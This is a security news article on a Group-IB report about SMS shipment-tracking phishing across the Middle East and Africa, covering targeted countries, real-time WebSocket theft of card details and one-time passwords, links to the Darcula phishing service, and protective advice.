Cybercriminals are increasingly leveraging fake shipment tracking scams across the Middle East and Africa (MEA) region to steal sensitive banking data through sophisticated real-time phishing tactics. These evolving schemes exploit the widespread reliance on postal and courier services for e-commerce deliveries, turning everyday transactions into significant security vulnerabilities.
According to analysis by Group-IB, a sharp surge in these fake shipment tracking scams was observed starting in early 2024, with explosive growth anticipated through 2025. Between December 2025 and February 2026, Egypt emerged as the most targeted nation, with 119 reported incidents. South Africa followed with 20 cases, alongside 7 in Ghana and 5 in Kenya, indicating a broad regional impact.
The primary tactic involves sending urgent SMS messages to recipients claiming delivery issues with their packages. These messages typically prompt users to click a provided link to update their address or pay a small handling fee. The link then directs victims to a meticulously crafted fake courier website, designed to mimic legitimate services, aiming to gain their trust.
Once on the forged website, victims are persuaded to enter personal information, including banking credentials, debit or credit card numbers, and one-time passwords (OTPs). This data is then transmitted directly to the attackers in real-time, leaving victims with little opportunity to recognize the fraudulent nature of the interaction before their information is compromised.
The Group-IB report highlights that postal services were the most frequently impersonated sector, accounting for 115 confirmed cases. However, financial services, telecommunications providers, and mobility platforms have also been subjected to repeated targeting by these criminal operations.
Real-Time Credential Theft Through Embedded Scripts
What distinguishes these modern fake shipment tracking scams is their technical sophistication in capturing data instantaneously. Researchers discovered that the phishing pages employ embedded scripts that establish a WebSocket connection to an attacker-controlled server the moment a user accesses the page. This feature facilitates a live data feed, transmitting every keystroke—encompassing card numbers, CVV codes, and OTPs—directly to the scammer.
This real-time data exfiltration occurs without any visible indication to the victim that their sensitive information is being transmitted. Furthermore, the script generates a unique UUID token for each user session, allowing attackers to meticulously track individual victims and suggesting a highly organized, large-scale operation.
The perpetrators behind these campaigns utilize a broad criminal infrastructure that spans multiple countries. They frequently employ inexpensive and disposable domain extensions such as .xyz, .sbs, .shop, and .click. Analysis of these campaigns reveals shared IP addresses and overlapping hosting patterns, pointing towards coordinated efforts and potentially a centralized command structure.
Group-IB researchers also noted characteristics strongly associated with Darcula, a known Phishing-as-a-Service (PaaS) platform reportedly originating from China. Darcula offers a vast repository of over 20,000 counterfeit domains and more than 200 pre-designed phishing templates, which are readily available to criminal operators, streamlining their attacks.
The design of the phishing pages is also optimized for mobile devices, as SMS-based links are commonly accessed via smartphones. Attackers utilize URL masks, such as appending ‘index.html’, to make the malicious links appear more legitimate while ensuring the fraudulent page loads correctly on mobile browsers. These pages are often configured to display their full content only to mobile users, further enhancing their deceptive appearance.
Individuals are strongly advised to exercise caution and avoid clicking on any shipment tracking links received via SMS or messaging applications. The recommended practice is to navigate directly to the official courier website and manually enter the tracking number. Additionally, users should be wary of messages demanding immediate payment for delivery or address updates, as legitimate courier companies typically do not charge fees for redelivery services. Reporting suspicious messages to local cybersecurity authorities or postal services is crucial for tracking and combating these threats.
Businesses are encouraged to proactively publish regular alerts about phishing campaigns that impersonate their brand to keep their customers informed about emerging threats. Implementing email authentication protocols such as DMARC, DKIM, and SPF can significantly help prevent spoofed messages from reaching customer inboxes. Collaboration with mobile carriers to filter fraudulent SMS patterns and the provision of a public verification tool for tracking messages are also vital strategies to reduce the number of individuals falling victim to these pervasive scams.